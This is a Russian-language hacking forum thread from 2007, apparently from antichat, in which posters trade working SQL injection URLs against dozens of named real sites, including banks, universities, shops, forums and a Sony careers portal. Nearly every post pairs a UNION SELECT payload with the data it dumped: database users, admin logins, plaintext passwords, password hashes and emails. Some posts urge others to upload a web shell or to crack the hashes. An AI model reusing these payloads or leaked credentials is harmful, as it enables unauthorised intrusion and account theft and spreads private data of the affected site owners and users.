выводим таблицы, где есть колонка passwordhttp://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(table_schema,0x 3a,table_name),5+from+information_schema.columns+w here+column_name=char(112,97,115,115,119,111,1 14,100)+limit+0,1/*lotro:adds_users
runescape:adds_users
war:adds_users
выводим, например, колонки из lotro:adds_usershttp://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(column_name),5+ from+information_schema.columns+where+table_schema =char(108,111,116,114,111)+and+table_name=char(97, 100 ,100,115,95,117,115,101,114,115)+limit+0,1/*user_id
user_name
password
итдhttp://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+lotro.adds_users/*
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+war.adds_users/*
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+runescape.adds_users/*итд лимитом
Underwit
13.10.2007, 17:08
www.uselessjunk.com
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23/*
ну тут всё понятно)
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23+from+INFORMATION _SCHEMA.TABLES+LIMIT+16,1/*
админы
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(fld_username,0x3a, fld_password),7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+tbl_admin+limit+0,1/*
Юзеры
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(fld_username,0x3a, fld_password),7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+tbl_users+limit+0,1/*
Админка
www.uselessjunk.com/admin.php
админы:
id:name:pass
1:admin:tigerwoods
2:hoover:stile
3:turtle:turtleuj2007
4:matt:diabl0
-------------удалено---боян--------------
www.rare.ru
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,concat(version(),0x2F,databa se(),0x2F,user()),5/*
5.0.45-log/rareru/rareru@10.10.10.216
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,table_name,table_schema+from +information_schema.tables/*
Таблицы можно покопаться
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,pass,login+from+users/*
логин\хеш
http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(user(),0x3a,versi on( ),0x3a,database())/*&pi=1&PHPSESSID=zero@jafo.netdojo.net:4.1.22-standard:zero2
http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(username,0x3a,pas sword)+f rom+users/*&pi=1&PHPSESSID=rootadmin:cd92a26534dba48cd785cdcc0b3e6b d1 итд.. <395
http://www.confidence-mag.com/story.php?id=-7+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16/*v115400@dd5428.kasserver.com:4.0.23-Max-log:v115400
_Master-
13.10.2007, 21:14
http://www.yuretz.ru/prikol.php?id=-471+union+select+1,convert(version()+using+cp1251) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
z-chat.ru
http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(version(),0x2F,database(),0x 2F,user()),2/*
4.0.25/zchatspb/zchatspb@local
http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(login,0x2F,passwd,0x2F,icq), 2+from+user/*
логин\хеш\уин но там какой-то прикол с выводом .... наверно ограничение на длину строки .. хотя хз
да, можно выводить отдельно логин хеш и уин но так не красиво )
reporter.kherson.ua
http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7,8,9/*
5.0.32-Debian_7etch1-log:reporter:lsd@localhost
http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,3,uname,5,6,7,pass,9+from+users +limit+7,1/*
логин \ пароль
http://drugspharma.com/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version (),0x3a,database()),5,6,7, 8,9,10,11/*hunting_tkdph@localhost:4.1.22-standard:hunting_tkrxhttp://refill-rx.net/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*pdlweb@localhost:4.1.22-standard:pdlweb_Pharmacy
0nep@t0p
14.10.2007, 16:43
БашкомснабБанк
http://www.bashkomsnabbank.ru/news/view?id=-133+union+select+1,2, 3,concat(login,0x3a, password),5,6,7+from+users+limit+2,10/*
Version:4.0.27-standard-log
User:bashbank@localhost
6 юзеров, все имеют доступ к обминке, среди которых:
denis:72d0d440b5ebc3cb162bf2cbd0f680ee:za1og
blair:098f6bcd4621d373cade4e832627b4f6:test
http://www.bashkomsnabbank.ru/admin
Кто не боится, заливаем шелл ;)
KPOT_f!nd
14.10.2007, 16:45
http://bestposters.ru/main.php?cat=-70+union+select+1,2,concat(login,0x3a,password,0x3 a,email),4,5+from+users+limit+1/*
Шоп по продаже постеров.
P.S: работаем через лимит )
exactly.ru
http://www.exactly.ru/?sub=-10'+union+select+1,concat(version(),0x3a,database( ),0x3a,user()),3/*
5.0.27-log:catalog2:catalog2@localhost
http://www.exactly.ru/?sub=-10'+union+select+1,table_name,3+from+information_s chema.tables+limit+0,1/*
Доступ к information_schema. Ничего интересного не нашел
ma3da.ru
http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.20-lk-log:ma3daru:ma3daru@localhost
все запросы к таблицам отвергаются (
Моя первая найденная инъекция
http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+co ncat(version(),0x3a,database(),0x3a,u ser()),2,3/*
Раскрутите кто-нибудь,а то ничего не выходит(
http://www.gardenshop.ru/co urier.php?CategoryId=-329+union+select+1,table_name,3+from+information_s ch ema.tables+limit+31,1/*
http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+1,co lumn_ name,3+from+INFORMATION_SCHEMA.COLUMNS+where+table _name='Users'+limit+1,1/*
Наконец-то кое-что стоящее:
epiphyte.ru
http://www.epiphyte.ru/?rid=-53+union+select+1,2,concat(version(),0x3a,database (),0x3a,user())/*
5.0.45-log:u18378:u18378@10.10.223.230
http://www.epiphyte.ru/?rid=-53+union+select+1,2,concat(username,0x3a,user_pass word,0x3a,user_icq)+from+phpbb_users+limit+1,1/*
логин\хеш\уин phpbb больше 3к записей, перебирайте лимитом ))
---------------------------------------------------------------
http://www.i.love.crimea.net/partner.php3?id=-6+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3/*
5.0.27-log:ilove:ilove@localhost
http://www.i.love.crimea.net/partner.php3?id=-6+union+select+1,2,table_name+from+information_sch ema.tables+limit+0,1/*
доступ к information_schema
http://www.cheryclub.org.ua/index.php?area=1&p=gallery&action=showimages&galid=-3+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3/*
4.1.21-standard-log:cheryclu_chery:cheryclu_ptax@localhost
http://www.bagozzi.com.br/?system=news&eid=-8%20union%20select%201,concat(user,0x3d,senha)%20F ROM%20user/*
[53x]Shadow
14.10.2007, 18:28
SONY Corp.
Достаточно не простой запрос пришлось составлять.
Усечение не робит =\
User: iq-app
DBName: Careers3
Интересные таблицы:
(Client)
http://scajobs.sony.com/careers/joblist.asp?location=443202))+and+(c.city_name+not +in('asd'))+and+1=(SELECT+TOP+1+COLUMN_NAME+FROM+C areers3.INFORMATION_SCHEMA.columns+WHERE+TABLE_NAM E='client'+AND+COLUMN_NAME+NOT+IN('client_id','cou ntry_code','hodes_generic','hodes_suffix','client_ name','division_name','office_id','status_indicato r','address1','address2','city','state','contact', 'zip_code','phone','batch_client_id','created_user _mgt_id','created_datetime','last_update_user_mgt_ id','last_update_datetime',%20'hiring_org_id','upd ated','old_generic','old_suffix','smartlink_url',' apply_statement_indicator','live_smartlink_stateme nt','static_smartlink_statement','FTIndex_Timestam p','update_status','isProvisioned','isAMSDownloada ble','AMSDownloaded_Datetime',%20'sourcingAttribut ionType','attributionQueryStringName'
(user_mgt_additional_info)
http://scajobs.sony.com/careers/joblist.asp?location=443202))+and+(c.city_name+not +in('asd'))+and+1=(SELECT+TOP+1+COLUMN_NAME+FROM+C areers3.INFORMATION_SCHEMA.columns+WHERE+TABLE_NAM E='user_mgt_additional_info'+AND+COLUMN_NAME+NOT+I N('user_mgt_id','office_id','first_name','last_nam e','email_address','phone_area_number','phone_numb er','phone_extention','fax_area_number','fax_numbe r','fax_extention','type_indicator','spelling_indi cator','team_indicator','advise_expiration_days'%2 0,'advise_expiration_days','email_notification_ind icator','smartlink_indicator','client_id','hiring_ orgID','minimum_cost','view_batch','created_user_m gt_id','created_datetime','last_update_user_mgt_id ','last_update_datetime','ReportingID','Applicatio nID','Contact_typeID','Company_Name','Contact_Name ','Auto_Total','Reply_To_Email','IsTranslator'
(emedia)
http://scajobs.sony.com/careers/joblist.asp?location=443202))+and+(c.city_name+not +in('asd'))+and+1=(SELECT+TOP+1+COLUMN_NAME+FROM+C areers3.INFORMATION_SCHEMA.columns+WHERE+TABLE_NAM E='emedia'+AND+COLUMN_NAME+NOT+IN('emedia_id','eme dia_code','Hodes_Emedia_code','emedia_type_id','me dia_typeID','active_indicator','media_entry_type', 'display_order','ranking_metrix'
дальше не рыл запарился и так, кому интересно сливайте инфу...
thx blackybr
Heavy Metal
14.10.2007, 19:16
http://www.mcsr.olemiss.edu/herbarium/smncheckacc.php?accession=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,concat_ws(0x3a,table_schema,table_name),17,18,19, 20,21+from+information_schema.tables/*
http://www.mad-love.ru/health.php?grp=15&item=-1+union+select+1,2,login,psw,5,6+from+users+where+ login='admin'
http://oikumena.intalev.ru/search_result.php?cid=49999999%20union/**/select/**/0,concat(sb_admin_name,char(58),sb_pwd,char(58),sb _id),2,3/**/from/**/sbjbs_admin/*
adm:adm:1
http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15/*u32445@10.10.223.235:5.0.45-log:u32445
http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(login,0x3a,pass),3,4,5,6,7 ,8,9,10,11,12,13,14,15+from+u32445.administrators+ limit+0,1/*admin:ftn-admn
fortun:test
sirius:admn
http://www.sea-cruise.ru/index.php?info=ships&id=-1+union+select+1,concat(login,0x3a,pass,0x3a,email ,0x3a,city),3,4,5,6,7,8,9,10,11,12,1 3,14,15+from+u32445.users+limit+0,1/*sirius:123456:sirius@nm.ru:moscow
http://www.armofthesea.org/calendar/index.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat (user(),0x3a,version(),0x3a,database()),26,27,28,2 9,30,31,32,33,34,35,36,37, 38,39,40,41,42,43/*aots_default@localhost:4.1.22-standard:aots_default
http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4/*&isref=0&page=0&orderby=identity&sort=asckeiser@blur.compbio.ucsf.edu:5.0.45:keiser
http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(dbfs_ref_fk,0x3a,md5,0x3a, name,0x3a, code),3,4+from+keiser.dbfs_anno/*3:ЦA^Р ¬>·.—јYRpЧЕ:Cathepsin L Inhibitor:50160
14:�B�bwГ�Ь·Ёд`дЩ#:pgp-:pgp-
3:�Њ…ЌєkhaУќґ�-°а$:Guanylate Cyclase Activator:78251
3:ўsюqcXёk'#$–�ё�‚:Glucocorticoid:39100 итд
http://shoichetlab.compbio.ucsf.edu/~keiser/sea/search/viewer/index.php?table=9161&id=-1+union+select+1,concat(dbfs_ref_fk,0x3a,md5,0x3a, name,0x3a,code),3,4+from+keiser_ca.dbfs_anno/*
Библиотека программиста :)
Information_schema:
http://proge.info/go.php?id=9+union+select+1,2,3,concat(table_name,0 x3a,column_name),5,6,7+from+information_schema.col umns/*
вывод всех таблиц/колонок...
____________
____________
Information_schema.schemata:
http://proge.info/go.php?id=9+union+select+1,2,3,schema_name,5,6,7+f rom+information_schema.schemata/*
здесь выводим все бд,и подбираем в соответствии к интересующим нас таблице/колонке нужную, ибо table_schema не работает...
____________
____________
а это пример вывода:
http://proge.info/go.php?id=9+union+select+1,2,3,concat(login,0x3a,p ass,0x3a,email),5,6,7+from+hostp.admins/
____________ ;)[QUOTE]
Red_Red1
15.10.2007, 01:29
http://proge.info/go.php?id=9+union+select+1,2,3,schema_name,5,6,7+f rom+information_schema.schemata/*
здесь выводим все бд,и подбираем в соответствии к интересующим нас таблице/колонке нужную, ибо table_schema не работает...
Можно сделать так
http://proge.info/go.php?id=9+union+select+1,2,3,table_schema,5,6,7+ from+information_schema.tables+where+table_name=CH AR(97,100,109,105,110,115)/*
Прочитать об этом можно сдесь
https://forum.antichat.ru/threadnav19605-3-10.html - спасибо [53x]Shadow!
Тогда подбирать не нужно :)
Новосибирский государственный университет :
http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=-3244+union+select+user(),database(),3,4,5,6,7,8/*
Хоть там и дофига всяких форумов, я не смог вытянуть от туда ни одной таблицы. Может ктото добрым советом поможет ?
0nep@t0p
15.10.2007, 17:17
Инвестиционный городской банк ( Новосибирск )
http://www.mb-icb.ru/page.php?-private'/* */union/**/select/**/1,2,3,4,VERSION(),6,7,8,9, 10,11,12/*
Version: 4.0.13
User: olmi@localhost
Не смог подобрать таблицы, кто сможет, не скупитесь выкладывайте либо здесь, либо, на крайняк, в ПМ, может быть существует доступ к information_schema но идет фильтр на символ "." - точка
delay(0)
15.10.2007, 17:57
0nep@t0p, в 4 версии этой базы нету.
mazda-auto.ru
http://www.mazda-auto.ru/mazdainfo.php?fl=1&sl=8&qid=-503+union+select+1,2,3,concat(version(),0x3a,datab ase(),0x3a,user()),5,6/*
1. 5.0.45-log:u38612:u38612@10.10.223.222
http://www.mazda-auto.ru/mazdainfo.php?fl=1&sl=8&qid=-503+union+select+1,2,3,concat(username,0x2F,user_p assword,0x2F,user_icq),5,6+from+phpbb_users/*
логин\хеш\уин
Heavy Metal
15.10.2007, 19:18
http://www.blackrhino.biz/browse.phtml?by=category&cat_id=-1+union+select+aes_decrypt(aes_encrypt(concat_ws(0 x3a,username,password,email),31),31)+from+login+li mit+0,2/*
http://www.rosart.biz/index.phtml?categoryID=-1+union+select+concat_ws(0x3a,0x223e,login,passwor d)+from+users+limit+0,1/*
fkclub.ru
http://fkclub.ru/index.php?page=showarticle&id=-13+union+select+concat(version(),0x3a,database(),0 x3a,user()),2,3,4/*
4.1.22:ru10000_fkclub:ru10000_mysql@194.85.90.130
http://fkclub.ru/index.php?page=showarticle&id=-13+union+select+concat(username,0x2F,user_password ,0x2F,user_icq),2,3,4+from+phpbb_users+limit+6,1/*
логин\хеш\уин
----------------------------------------------
http://www.paradive.ru/diving/news/index.html?view_id=-1'+union+select+1,concat(version(),0x2F,user()),3, 4,5/*
5.0.22/sabotag@localhost
Первая успешно проведённая скуль,а всего вторая.Ногами не пинать)
http://sant exnika.ru/brands.html?id=-228+UNION+SELECT+1,conc at(version(),0x3a,data base(),0x3a,user()),3,4,5,6,7,8,9/*
5.0.45:u35457:u35457@10.10.12.116
Таблицы
http://san texnika.ru/brands.html?id=-228%20UNION%20SELECT%201,table _name,3,4,5,6,7,8,9%20from%20information_sch ema.tables/*&kp=all
Столбцы
http://santex nika.ru/brands.html?id=-228%20UNION%20SELECT%201,column_name,3,4,5,6,7,8,9 %20from%20information_schema.columns/*&kp=all
Админ
http://santexn ika.ru/brands.html?id=-228+UNION+SELECT+1,concat(logi n,0x3a, password,0x3a,email),3,4,5,6,7,8,9+from+ users/*
admin:$1$oJ$lZmJWDleYk
santexnika:$1$H0$9elwV.6Pn8
Админку не нашёл
http://www.spb-center.ru/content.php?id=-1'+union+select+concat(user( ),0x3a,version(),0x3a,database())/*Uwww3046S@localhost:4.0.26-log:udb3046
http://www.meleuz.ru/index.php?text_id=news&id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6 /*&PHPSESSID=dc258c69b267e9f170975144ed5f6c99meleuz90 _base@v29.valuehost.ru:4.0.27-max-log:meleuz90_base
http://moscowmaps.ru/index.php?aid=72&sid=112&text_id=-1+union+select+1,2,3,4,5,concat(login,0x3a,passwor d)+from+administrators/*asa:ltrf,hm anahal:univer
http://nagore.ru/default.php?section=sch&part=aro&article=178&text_id=-1+union+select+concat(name, 0x3a,login,0x3a,pass)+from+admins/*admin:admin:parol test:test:test
http://fondsi.ru/default.php?to_show=shp&sub_id=&art_id=&text_id=-1+union+select+1,concat(login, 0x3a,password),3+from+administrators/*admin:fondsi.ru mishasun:2038134 anahal:parol boss:faina vasek:bbs
http://drikung.ru/index.php?aid=36&sid=40&text_id=-1+union+select+1,2,3,4,5,concat(login,0x3a,passwor d)+from+administrators+limit+0,1/*admin:parol
dorama.ru
http://www.dorama.ru/?t=news&sm=news&nsid=-1+union+select+1,2,3,4,concat(version(),0x2F,datab ase(),0x2F,user()),6/*
5.0.21/doramaru/doramaru@81.177.16.41
http://www.dorama.ru/?t=news&sm=news&nsid=-1+union+select+1,2,3,4,concat(username,0x2F,user_p assword,0x2F,user_icq),6+from+phpbb_users+limit+4, 1/*
логин\хеш\уин
0nep@t0p
16.10.2007, 11:02
Международный Акционерный Банк
http://www.mab.ru/ru/services/crediting/?id=-54'+union+select+1,2,3,VERSION(),5,6/*
Version: 4.0.21-Max
User: mab@localhost
-=lebed=-
16.10.2007, 11:42
Уязвимость в Softbiz Recipes Portal Script:
Уязвимость существует из-за недостаточной обработки входных данных в параметре «sbcat_id» сценарием searchresult.php.
Поиск в гугл: inurl:"searchresult.php?sbcat_id="
Пример: _http://recept.promolist.ru
[sql-inj]
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,database(),0x3a,user()),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22/*
Таблицы:
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,table_name,17,18,19,20,21,22/**/from/**/information_schema.tables/*
Колонки:
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,column_name,17,18,19,20,21,22/**/from/**/information_schema.columns/*
Админ:
http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,concat(sbadmin_name,0x3a,sbadmin_p wd),17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
http://www.daev-plaza.ru/
В поле поиска вводим -1+union+select+1,2,password,4,5,6,7,8,9,10,11,name ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30+from+admin/*
5 админов :
dima:1
root:
Gasiev:popcorn
az:
roman:rhdvny
Но в админку не папал :(
http://www.galerialeme.com/exposicoes_textos.php?lang=ing&id=88&text_id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3/*galerialeme@200.234.200.3:4.0.27-locaweb-log:galerialeme
http://www.christophkeller.com/films_view.php?text_id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9,10,11,12/*&id=11pierre_keller@localhost:4.1.22-standard-log:pierre_keller
http://www.christophkeller.com/films_view.php?text_id=-1+union+select+1,aes_decrypt(aes_encrypt(login,0x7 1),0x71),3,aes_decrypt(aes_encrypt(password,0x71), 0x71),5,6,7,8,9,10,11,12+from+users/*&id=11keller:helioflex pierre:cachou
http://www.nomen.com/index.php?language_id=2&menu_id=4&text_id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase())/*root@localhost:4.0.26-nt:nomen
http://www.nomen.com/index.php?language_id=2&menu_id=4&text_id=-1+union+select+concat(user,0x3a,password)+from+mys ql.user/*root:1e30d6d6558d5312
http://www.ms-chat.com/magazine/article.show.php?text_id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9/*doolao@81.169.177.180:5.0.32-Debian_7etch1-log:doolao
http://www.ms-chat.com/magazine/article.show.php?text_id=-1+union+select+1,2,3,concat(username,0x3a,user_pas sword,0x3a,user_email),5,6,7,8,9+from+phpbb_users/*весомый вывод =) да и портал популярный
http://lawfirm.ru/news/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,concat(user(),0x3a,version(),0x3a,database()), 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*root@pm9:4.0.24:lawf http://lawfirm.ru/news/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,concat(user,0x3a,password),18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+from+mysql.user+limit +0,1/*root:17f62162237a6ce9 http://www.cultspace.org/viewHolyTextComments.php?text_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database())/*cultspac_root@localhost:4.1.22-standard-log:cultspac_productionhttp://www.escortenpriveontvangst.nl/index.php?open=list.php&sex_id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,da tabase()),9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*escort@localhost:4.1.20-log:escort_escorthttp://www.escortenpriveontvangst.nl/index.php?open=list.php&sex_id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,concat(username,0x3a,user_password,0 x3a,user_email),9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55/**/from/**/phpbb_users/*escortenpriveontvangst:5d1b83c5157b695ff205ab741e 4a2609:info@escortenpriveontvangst.nlhttp://www.nightnday.org/detail.php?list_id=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19/*atom_nightnday@localhost:5.0.22:nightnday
http://recept.promolist.ru/searchresult.php?sbcat_id=%20999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,s badmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
admin KAPACb
raum.ru
http://www.raum.ru/articles.php?id=-1'+union+select+1,2,3,4,5,concat(name,0x3a,passwor d,0x3a,icq_number),7,8+from+vitz_forums.ibf_member s/*
логин\хеш\уин используется базе, что и на vitz.ru , скулю к которому я выкладывал ранее.
http://rapidshare.com/files/62099632/hashes.rar.html - тут расшифровка хешей ( спасибо delay(0)'ю )
-------------------------------------------------------------
externat.kspu.ru
http://externat.kspu.ru/forum/thread.php?threadid=298&topicid=-1+union+select+concat(version(),0x2F,database(),0x 2F,user())/*
4.0.24_Debian-10sarge2-log/externat/root@localhost
http://externat.kspu.ru/forum/thread.php?threadid=298&topicid=-1+union+select+concat(user_login,0x2F,user_passwor d)+from+users+limit+0,1/*
логин\хеш
УкрТяжМет
форум почитателей тяжелой музыки :)
http://utm.in.ua/bands.php?mode=band&bid=-1319+union+select+1,concat_ws(0x3C62723E,username, user_icq,user_password,user_email),3,4,5,char(0x63 ,0x72,0x61,0x63,0x6b,0x65,0x64,0x20,0x62,0x79,0x20 ,0x66,0x6f,0x62,0x6f,0x66,0x6f,0x62,0x20,0xa9,0x20 ,0x28,0x41,0x6e,0x74,0x69,0x63,0x68,0x61,0x74,0x29 ),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32+from+utm_users+limit+48 14,1/*
;)
Heavy Metal
17.10.2007, 13:35
http://www.marimedia.ru/news.php?news=-1+union+select+1,2,3,4,concat_ws(0x3a,converge_id, converge_pass_hash,converge_pass_salt,converge_ema il),6,7,8,9,10,11+from+marimediaru_forum.ibf_membe rs_converge+limit+0,1
http://www.castledragmire.com/ragnarok/forums/forum.php?id=-1+union+select+1,2,concat_ws(0x203a20,name,passwor d,icq,email),4,5,6,7,8,9,10+from+users/*
webdive.ru
http://www.webdive.ru/diveclub.php?a=1&id_town=-126+union+select+concat(version(),0x3a,database(), 0x3a,user()),2/*
5.0.27:nas3ru_dive:nas-3ru@81.177.16.91
http://www.webdive.ru/diveclub.php?a=1&id_town=-126+union+select+concat(name,0x2F,pass),2+from+fus er+limit+0,1/*
логин\пароль не хешированный ))
http://www.lvkrk.ee/index.php?task=galerii_teemad&list_id=9999999/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database() ),5/*root@localhost:4.0.20-log:kodu
http://www.lvkrk.ee/index.php?task=galerii_teemad&list_id=9999999/**/union/**/select/**/1,2,3,concat(user,0x3a,password),5+from+mysql.user/*root:157cda3a54492a1e
phpgw:157cda3a54492a1e
admin:73a3bfe82d187e5b
phpgroupware:1a23abc3400d85c1http://www.onlineitools.com/nl/nl-archive.php?bus_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0 x71),0x71)/*&list_id=14.1.9-standard-log
http://www.gtreview.com/events/event_detail.php?List_ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version( ),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*exporta@localhost:4.1.20-log:dbExporta
http://202.205.109.23/new_wish/new_word.php?info_kind=2&list_id=-1+union+select+1,2,3,4,concat(user,0x3a,password)+ from+mysql.user/*root:0af0288503451485http://www.librariacarter.ro/edituri.php?e_id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2/*libraria@localhost:4.1.20:libraria
http://www.agenda.unizh.ch/liste.php?list_type=reihe&list_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(user(), 0x71),0x71),4,5,6,aes_decrypt(aes_encrypt(database (),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,aes_de crypt(aes_encrypt(version(),0x71),0x71),36,37,38,3 9,40,41,42/*ibis@idwww02.unizh.ch 5.0.18-Max ibis
http://www.mercatigenerali.org/eventi_detail.php?e_id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9,10,11/*Sql68148@62.149.140.36:4.0.27-standard-log:Sql68148_1
4job.ru
http://www.4job.ru/?pg_id=-1+union+select+concat(version(),0x2F,database(),0x 2F,user())
4.1.22/job4/job4@localhost
http://www.4job.ru/?pg_id=-1+union+select+concat(login,0x2F,password)+from+us ers+limit+1,1
логин/пароль
admin/999000
-------------------------------------------------------------------
http://www.professia.ru/res_search.php?ID=-2+union+select+concat(version(),0x2F,database(),0x 2F,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18/*
4.1.14-log/profess9_profess9/profess9_profess@localhost
rabotka.ru
http://www.rabotka.ru/index.php?empty=1&idl=-3+union+select+concat(version(),0x2F,database(),0x 2F,user())
5.0.45/kikkas_job/kikkas@localhost
http://www.rabotka.ru/index.php?empty=1&idl=-3+union+select+concat(id,0x2F,name,0x2F,parol)+fro m+kikkas_job.webiusers+limit+0,1
ид\имя\пароль не хеш. в <title>
--------------------------------------------------------------
minerjob.ru
http://www.minerjob.ru/viewnew.php?id=-1+union+select+1,2,3,4,5,concat(version(),0x2F,dat abase(),0x2F,user())/*
5.0.32-Debian_7etch1-log/jobnet_mine/jobnet_mine@85.249.135.10
http://www.minerjob.ru/viewnew.php?id=-1+union+select+1,2,3,4,5,concat(first_name,0x2F,em ail,0x2F,pwd)+from+users+limit+1,1/*
имя\мейл\пароль не хеш.
http://www.nhia.edu/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_e ncrypt(concat(version(),0x33a,user()),1),1),22,33, 44,55,66,77,1,1,1,1,1,1,1,1+from+news/*
http://www.hvcc.edu/news_events/newsstory.php?id=-1+union+select+1,host,password,user,5,6,7,8,9,11,1 2,13,14,15+from+mysql.user+limit+0,1/*
http://gopanthers.fit.edu/sports_info/view.php?id=-1+union+select+1,2,current_time(),version()/*
http://www.hostingdirectory.us/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13/**
http://www.armagh.gov.uk/show_council_department.php?dis=whoswho&show_sub=7&department_id=-1+union+select+1,2,3,4,5,VERSION(),7,8,9,10/*
http://www.eng.wayne.edu/page.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(ve rsion(),0x33a,user(),0x3a,0x3a,id,0x3a,accessid),1 ),1),3,4,5,7+from+users/*
_http://www.storage.ru/_newstor/news.php?id=-22+union+select+admin,password,nick,4,5+from+users +limit+1,1
storage:*0F92CFEE8E9D2DAB2209AC88700985F6425EC4A1
_http://www.impact.org/news.php?id=-22+union+select+1,2,3,4,concat_ws(0x3a,login,passw ord),6,7,8+from+users+limit+1,1
carlo:47ffb440cc2afb7bba618a02bd25741e
